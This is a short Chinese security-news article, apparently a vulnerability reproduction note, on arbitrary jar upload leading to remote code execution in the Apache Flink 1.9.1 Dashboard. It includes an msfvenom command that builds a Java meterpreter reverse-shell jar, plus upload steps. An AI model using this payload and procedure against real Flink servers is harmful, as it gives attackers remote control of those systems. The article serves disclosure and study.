Apache Flink 任意 Jar 包上传致 RCE

06W+0

漏洞概述:


Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能;漏洞影响:至目前最新版本Apache Flink 1.9.1;攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的

环境:
下载http://mirrors.tuna.tsinghua.edu … -bin-scala_2.11.tgz

Apache Flink 任意 Jar 包上传致 RCE 

解压后访问8081端口

Apache Flink 任意 Jar 包上传致 RCE

Apache Flink 任意 Jar 包上传致 RCE

msfvenom -p java/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f jar > rce.jar

上传后点击 Submit

Apache Flink 任意 Jar 包上传致 RCE

Apache Flink 任意 Jar 包上传致 RCE

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
安全资讯
# RCE# Apache Flink# 任意 Jar 包
喜欢就支持一下吧
点赞0 分享
Afeifei666666的头像-华盟网
360推出Tuber可直接上油管的浏览器!-华盟网
360推出Tuber可直接上油管的浏览器!
360推出Tuber可直接上油管的浏览器!
6年前 75W+
2020薪资最高的行业前十位出炉!你选对了吗?-华盟网
2020薪资最高的行业前十位出炉!你选对了吗?
2020薪资最高的行业前十位出炉!你选对了吗?
6年前 56.6W+
原创干货 | 一次对某组织的应急响应-华盟网
原创干货 | 一次对某组织的应急响应
原创干货 | 一次对某组织的应急响应
6年前 49.6W+
黑鹰基地站长最新动态-华盟网
黑鹰基地站长最新动态
黑鹰基地站长最新动态
6年前 49.5W+
关注 | 《网络信息内容生态治理规定》今日起正式施行(附全文及解读)-华盟网
关注 | 《网络信息内容生态治理规定》今日起正式施行(附全文及解读)
关注 | 《网络信息内容生态治理规定》今日起正式施行(附全文及解读...
6年前 47.5W+
微软确认修复Windows 10 19041官方镜像下载反复报错问题-华盟网
微软确认修复Windows 10 19041官方镜像下载反复报错问题
微软确认修复Windows 10 19041官方镜像下载反复报错问题
6年前 29.8W+
相关推荐
S时评:奥巴马时代的网络安全-华盟网
S时评:奥巴马时代的网络安全
S时评:奥巴马时代的网络安全
10年前 188W+
360推出Tuber可直接上油管的浏览器!-华盟网
360推出Tuber可直接上油管的浏览器!
360推出Tuber可直接上油管的浏览器!
6年前 75W+
2020薪资最高的行业前十位出炉!你选对了吗?-华盟网
2020薪资最高的行业前十位出炉!你选对了吗?
2020薪资最高的行业前十位出炉!你选对了吗?
6年前 56.6W+
原创干货 | 一次对某组织的应急响应-华盟网
原创干货 | 一次对某组织的应急响应
原创干货 | 一次对某组织的应急响应
6年前 49.6W+
黑鹰基地站长最新动态-华盟网
黑鹰基地站长最新动态
黑鹰基地站长最新动态
6年前 49.5W+
BlackHat 2018 | 10大网络安全热点趋势-华盟网
BlackHat 2018 | 10大网络安全热点趋势
BlackHat 2018 | 10大网络安全热点趋势
8年前 49.2W+
评论 抢沙发

请登录后发表评论

    暂无评论内容

test1111

分类